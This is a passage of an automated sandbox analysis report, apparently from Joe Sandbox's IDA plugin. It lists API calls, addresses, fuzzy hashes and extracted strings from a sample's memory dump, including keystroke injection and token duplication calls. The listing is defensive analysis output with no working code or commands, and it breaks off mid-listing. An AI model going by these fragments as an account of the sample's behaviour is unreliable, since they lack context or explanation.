                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: __lock_file_memset
                                                                            • String ID:
                                                                            • API String ID: 26237723-0
                                                                            • Opcode ID: c74911371e76cb9dc4786cfdbe28690debad29cef5acae8c4501fea9e7903076
                                                                            • Instruction ID: c8a12bf2a45d0ac11074f8cac28b928f9e20b60047ac9024d749846706a082ab
                                                                            • Opcode Fuzzy Hash: c74911371e76cb9dc4786cfdbe28690debad29cef5acae8c4501fea9e7903076
                                                                            • Instruction Fuzzy Hash: 32012971C00609FBCF22AF65DC029DF3B31AF44714F04815BF82416261D7798AA2DF99
                                                                            APIs
                                                                              • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
                                                                              • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
                                                                            • __lock_file.LIBCMT ref: 00414EE4
                                                                              • Part of subcall function 00415965: __lock.LIBCMT ref: 0041598A
                                                                            • __fclose_nolock.LIBCMT ref: 00414EEE
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: __decode_pointer__fclose_nolock__getptd_noexit__lock__lock_file
                                                                            • String ID:
                                                                            • API String ID: 717694121-0
                                                                            • Opcode ID: 6051778e024176e7de16a1974b8d1b3b80c3b8a23747dfcb666cdf4e7799d8f6
                                                                            • Instruction ID: 225a509e04b880138f2478077c57af59103cae2c072c29012e7845c0956b1514
                                                                            • Opcode Fuzzy Hash: 6051778e024176e7de16a1974b8d1b3b80c3b8a23747dfcb666cdf4e7799d8f6
                                                                            • Instruction Fuzzy Hash: DEF06270D0470499C721BB6A9802ADE7AB0AFC1338F21864FE479A72D1C77C46C29F5D
                                                                            APIs
                                                                            • KiUserCallbackDispatcher.NTDLL(00002000,00000000,0040D89F,00000000,?,?,0040D89F,001B2EB8), ref: 0040F386
                                                                            • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002,?,0040D89F,001B2EB8), ref: 0040F39E
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: CallbackDispatcherInfoParametersSystemUser
                                                                            • String ID:
                                                                            • API String ID: 1232580896-0
                                                                            • Opcode ID: e8c90ec597a1944ae78b7ca20706975efaf7c61f5b7d6b196fc3d6e6037ce03d
                                                                            • Instruction ID: 65e1473dc04fc68897f4a965434dba24c69ef846d3a13abfb0e70c8142ecb83e
                                                                            • Opcode Fuzzy Hash: e8c90ec597a1944ae78b7ca20706975efaf7c61f5b7d6b196fc3d6e6037ce03d
                                                                            • Instruction Fuzzy Hash: F2E0EC727953107AF21486408C46F56A7989B44B11F10C51AB7059B1C1C6F0A840CB95
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: ProtectVirtual
                                                                            • String ID:
                                                                            • API String ID: 544645111-0
                                                                            • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                            • Instruction ID: fb1d736feddc8336b94c661b4f3a99b04f66f7614ca83ae43ac4a02a862e88ab
                                                                            • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                            • Instruction Fuzzy Hash: 1331D574A00105DFC718DF99E490AAAFBA6FB49304B2486A6E409CB751D774EDC1CBC5
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 0d8ad4d875158e0120ed104e09085659f42b86f6d600f5d33fa38308f41241bf
                                                                            • Instruction ID: 573dba848690e0cdfd4c9be45b5663ff9194aa529e9341154cf92adfcd841cf8
                                                                            • Opcode Fuzzy Hash: 0d8ad4d875158e0120ed104e09085659f42b86f6d600f5d33fa38308f41241bf
                                                                            • Instruction Fuzzy Hash: 5E11C374200200ABC7249FAAD8D5F2A73A5AF45304B244C6FE845E7392D73CEC81EB5E
                                                                            APIs
                                                                            • DefWindowProcW.USER32(?,?,?,?), ref: 00401123
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: ProcWindow
                                                                            • String ID:
                                                                            • API String ID: 181713994-0
                                                                            • Opcode ID: 2bcff8431ba1ff294e2b1c33dceaa93ee25f984dfbecb3b506615433fd530346
                                                                            • Instruction ID: 72bdf1ad184d721e15e17473fba0dc1faec6c1a9a9d1f3fcb71c15abd8c9f185
                                                                            • Opcode Fuzzy Hash: 2bcff8431ba1ff294e2b1c33dceaa93ee25f984dfbecb3b506615433fd530346
                                                                            • Instruction Fuzzy Hash: FDF05436700118A7DF38995CE89ACFF632AD7ED350F418227FD152B3A6813C5C41966E
                                                                            APIs
                                                                            • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0041AA46
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: CreateHeap
                                                                            • String ID:
                                                                            • API String ID: 10892065-0
                                                                            • Opcode ID: 715419928b85d2867e9ba06f33a68846dd0d9c70f7b25bc38942ce62b1fa172d
                                                                            • Instruction ID: 99ddfbee892492b32903703907324a593b21f4d4a70cf9c354be63060b8faba1
                                                                            • Opcode Fuzzy Hash: 715419928b85d2867e9ba06f33a68846dd0d9c70f7b25bc38942ce62b1fa172d
                                                                            • Instruction Fuzzy Hash: 56D05E325543449EDF009F71AC087663FDCE788395F008836BC1CC6150E778C950CA08
                                                                            APIs
                                                                              • Part of subcall function 00444326: SetFilePointerEx.KERNEL32(00000000,00000001,00000000,00000000,00000001), ref: 004442F3
                                                                            • WriteFile.KERNELBASE(?,?,00000001,?,00000000), ref: 00444362
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: File$PointerWrite
                                                                            • String ID:
                                                                            • API String ID: 539440098-0
                                                                            • Opcode ID: 35769b91a3a7bdb08b20991cec1574ff36ffa6c1adc4d20a0c17b9033c9b0ad0
                                                                            • Instruction ID: 4a339a6eb5dfef6003722c1615037f540bc53d76d7f4c43935d02bdd90bbdfc9
                                                                            • Opcode Fuzzy Hash: 35769b91a3a7bdb08b20991cec1574ff36ffa6c1adc4d20a0c17b9033c9b0ad0
                                                                            • Instruction Fuzzy Hash: 7CE09275104311AFD250DF54D944F9BB3F8AF88714F108D0EF59587241D7B4A9848BA6
                                                                            APIs
                                                                              • Part of subcall function 0041181B: __lock.LIBCMT ref: 0041181D
                                                                            • __onexit_nolock.LIBCMT ref: 004113FD
                                                                              • Part of subcall function 004112FA: __decode_pointer.LIBCMT ref: 00411309
                                                                              • Part of subcall function 004112FA: __decode_pointer.LIBCMT ref: 00411319
                                                                              • Part of subcall function 004112FA: __msize.LIBCMT ref: 00411337
                                                                              • Part of subcall function 004112FA: __realloc_crt.LIBCMT ref: 0041135B
                                                                              • Part of subcall function 004112FA: __realloc_crt.LIBCMT ref: 00411371
                                                                              • Part of subcall function 004112FA: __encode_pointer.LIBCMT ref: 00411383
                                                                              • Part of subcall function 004112FA: __encode_pointer.LIBCMT ref: 00411391
                                                                              • Part of subcall function 004112FA: __encode_pointer.LIBCMT ref: 0041139C
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: __encode_pointer$__decode_pointer__realloc_crt$__lock__msize__onexit_nolock
                                                                            • String ID:
                                                                            • API String ID: 1316407801-0
                                                                            • Opcode ID: d4f7479c18d2f3dc105ebfe0f2eac5810891221413fa193614bbe2c2ae41d224
                                                                            • Instruction ID: 67ef268c6cd115d101ef856db97c2ea624f8e5cc5d3a941a6f1fba9d4c5b72b9
                                                                            • Opcode Fuzzy Hash: d4f7479c18d2f3dc105ebfe0f2eac5810891221413fa193614bbe2c2ae41d224
                                                                            • Instruction Fuzzy Hash: 07D01731901205AACB00FFAAD8067CC76706F04318F20819AB114662E2CB3C46C19A18
                                                                            APIs
                                                                            • DefWindowProcW.USER32(?,?,?,?), ref: 00401123
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: ProcWindow
                                                                            • String ID:
                                                                            • API String ID: 181713994-0
                                                                            • Opcode ID: 837c1f5b160989e4bc04331483680d437582dbd9ffcfcea34caefcb6c1da81af
                                                                            • Instruction ID: 4c36cba44089d0e03573cc5e8dee84df23505be31ebc2729507753268ee0d302
                                                                            • Opcode Fuzzy Hash: 837c1f5b160989e4bc04331483680d437582dbd9ffcfcea34caefcb6c1da81af
                                                                            • Instruction Fuzzy Hash: C3C08C72100008BB8700DE04EC44CFBB72CEBD8310700C20BBC0586201C230885097A1
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: __wfsopen
                                                                            • String ID:
                                                                            • API String ID: 197181222-0
                                                                            • Opcode ID: d1a4d26266dcb7911ef956bf4afcad96e19892d5a9e8770749e386b2bd63db79
                                                                            • Instruction ID: 6225ca515e7db1e5d7746fb8cf1e0ad45b41b4d1817cc5a1d8a93eb941133566
                                                                            • Opcode Fuzzy Hash: d1a4d26266dcb7911ef956bf4afcad96e19892d5a9e8770749e386b2bd63db79
                                                                            • Instruction Fuzzy Hash: EDC09B7644010C77CF122943FC02E453F1997C0764F044011FB1C1D561D577D5619589
                                                                            APIs
                                                                            • __encode_pointer.LIBCMT ref: 004169E2
                                                                              • Part of subcall function 0041696E: TlsGetValue.KERNEL32(00000000,?,004169E7,00000000,00422F48,00496770,00000000,00000314,?,00418216,00496770,Microsoft Visual C++ Runtime Library,00012010), ref: 00416980
                                                                              • Part of subcall function 0041696E: TlsGetValue.KERNEL32(00000003,?,004169E7,00000000,00422F48,00496770,00000000,00000314,?,00418216,00496770,Microsoft Visual C++ Runtime Library,00012010), ref: 00416997
                                                                              • Part of subcall function 0041696E: RtlEncodePointer.NTDLL(00000000,?,004169E7,00000000,00422F48,00496770,00000000,00000314,?,00418216,00496770,Microsoft Visual C++ Runtime Library,00012010), ref: 004169D5
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Value$EncodePointer__encode_pointer
                                                                            • String ID:
                                                                            • API String ID: 2585649348-0
                                                                            • Opcode ID: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                                                                            • Instruction ID: f62f3284a010ca3bbb159d13ec07db3ba5ef3bb17cb580217ffea2be35a92f46
                                                                            • Opcode Fuzzy Hash: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                                                                            • Instruction Fuzzy Hash:
                                                                            APIs
                                                                            • CloseHandle.KERNELBASE(00000000), ref: 0040D91D
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: CloseHandle
                                                                            • String ID:
                                                                            • API String ID: 2962429428-0
                                                                            • Opcode ID: b0db0cc9728059d6acb69f925b284233246e7185417bf28957a0aabd78f307cc
                                                                            • Instruction ID: 397672216df932ca6c22f29d52987cd2165f63c791f69eb8015935d900cfb6d9
                                                                            • Opcode Fuzzy Hash: b0db0cc9728059d6acb69f925b284233246e7185417bf28957a0aabd78f307cc
                                                                            • Instruction Fuzzy Hash: 16E0DEB5900B019EC7318F6AE544416FBF8AEE46213248E2FD4E6D2A64D3B4A5898F54
                                                                            APIs
                                                                            • Sleep.KERNELBASE(000001F4), ref: 03A45429
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429781740.0000000003A43000.00000040.00000020.00020000.00000000.sdmp, Offset: 03A43000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_3a43000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Sleep
                                                                            • String ID:
                                                                            • API String ID: 3472027048-0
                                                                            • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                            • Instruction ID: 64173c586354ceaf4db57c06e034091a5fafdfafe18755040516d4587c0eb90d
                                                                            • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                            • Instruction Fuzzy Hash: FBE0E67498010DDFDB00DFB9D54969D7BB4EF04302F1041A1FD01D6280D6309D508A62
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: PF$PF$"DF$$JG$&F$&F$'HG$'|G$*"D$*nF$*vG$+%F$0wE$4rE$5CG$6MG$6NF$6tE$7eF$<HF$<G$ApG$BnE$DvE$F)G$GSG$IqE$K@G$LbF$MdF$MuE$NgF$O*F$PIF$QbG$R+F$RnG$YlE$YtG$Z9G$ZPG$^[F$^oE$_7G$_?G$b"D$fH$i}G$j)F$kQG$lE$rTG$vjE$}eE$~mE$*F$.F$3G$_G$`F$mE$pE$wG
                                                                            • API String ID: 0-4260964411
                                                                            • Opcode ID: bb854585b2a8d25cf70b859c951904b6599901827447d171664d6ae6ba41e592
                                                                            • Instruction ID: b1e67458769bbea4a86cd8903524db5b6e79558e2e7ab8c51025fc7bd56032a7
                                                                            • Opcode Fuzzy Hash: bb854585b2a8d25cf70b859c951904b6599901827447d171664d6ae6ba41e592
                                                                            • Instruction Fuzzy Hash: 118366F1905B409FC351DFAAF984605BAE1F3AA3157A2857FC5088B731D7B8194A8F4C
                                                                            APIs
                                                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C158
                                                                            • DefDlgProcW.USER32(?,0000004E,?,?,004A83D8,?,004A83D8,?), ref: 0047C173
                                                                            • GetKeyState.USER32(00000011), ref: 0047C1A4
                                                                            • GetKeyState.USER32(00000009), ref: 0047C1AD
                                                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C1C0
                                                                            • GetKeyState.USER32(00000010), ref: 0047C1CA
                                                                            • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C1DE
                                                                            • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C20A
                                                                            • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C22D
                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047C2D6
                                                                            • SendMessageW.USER32 ref: 0047C2FB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$State$LongProcWindow
                                                                            • String ID: @GUI_DRAGID$@+$F$X+
                                                                            • API String ID: 1562745308-269343827
                                                                            • Opcode ID: dcc01cbd87ddd492c2c278cbacd50e58f25e8ccd866e9ebab9dee97b514268e5
                                                                            • Instruction ID: f40edf6d5039c675f00343e7880f865f139be9e64e9b8d530a61de5f06f6045f
                                                                            • Opcode Fuzzy Hash: dcc01cbd87ddd492c2c278cbacd50e58f25e8ccd866e9ebab9dee97b514268e5
                                                                            • Instruction Fuzzy Hash: C6429F702042019FD714CF54C884FAB77A5EB89B04F548A6EFA48AB291DBB4EC45CB5A
                                                                            APIs
                                                                            • GetForegroundWindow.USER32 ref: 004375B3
                                                                            • FindWindowW.USER32 ref: 004375D8
                                                                            • IsIconic.USER32(?), ref: 004375E1
                                                                            • ShowWindow.USER32(?,00000009), ref: 004375EE
                                                                            • SetForegroundWindow.USER32(?), ref: 004375FD
                                                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00437615
                                                                            • GetCurrentThreadId.KERNEL32(?,?,004448AF,?), ref: 00437619
                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 00437624
                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00437632
                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00437638
                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 0043763E
                                                                            • SetForegroundWindow.USER32(?), ref: 00437645
                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00437654
                                                                            • keybd_event.USER32 ref: 0043765D
                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043766B
                                                                            • keybd_event.USER32 ref: 00437674
                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00437682
                                                                            • keybd_event.USER32 ref: 0043768B
                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00437699
                                                                            • keybd_event.USER32 ref: 004376A2
                                                                            • SetForegroundWindow.USER32(?), ref: 004376AD
                                                                            • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004376CD
                                                                            • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004376D3
                                                                            • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004376D9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Thread$Window$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                            • String ID: Shell_TrayWnd
                                                                            • API String ID: 3778422247-2988720461
                                                                            • Opcode ID: ec12ba9e870cc2e5dd85ad52799cb15a6745d125a488419c4f0ebb71fc1ee38e
                                                                            • Instruction ID: 6108fbe056c1a000d5481f33e03d330ccc862392245923d3170deea12ea07584
                                                                            • Opcode Fuzzy Hash: ec12ba9e870cc2e5dd85ad52799cb15a6745d125a488419c4f0ebb71fc1ee38e
                                                                            • Instruction Fuzzy Hash: AC31A4712803157FE6245BA59D0EF7F3F9CEB48B51F10082EFA02EA1D1DAE458009B79
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 0044621B
                                                                            • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,?,?,?,?,?,?,?), ref: 00446277
                                                                            • CloseHandle.KERNEL32(?), ref: 0044628A
                                                                            • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004462A4
                                                                            • GetProcessWindowStation.USER32 ref: 004462BD
                                                                            • SetProcessWindowStation.USER32 ref: 004462C8
                                                                            • OpenDesktopW.USER32 ref: 004462E4
                                                                            • _wcslen.LIBCMT ref: 0044639E
                                                                              • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                            • _wcsncpy.LIBCMT ref: 004463C7
                                                                            • LoadUserProfileW.USERENV(?,00000000,00000000,?,?,00000000,?,?,?,?), ref: 004463E7
                                                                            • CreateEnvironmentBlock.USERENV(?,?,00000000,00000000,?,?,00000000,?,?,?,?), ref: 00446408
                                                                            • CreateProcessAsUserW.ADVAPI32 ref: 00446446
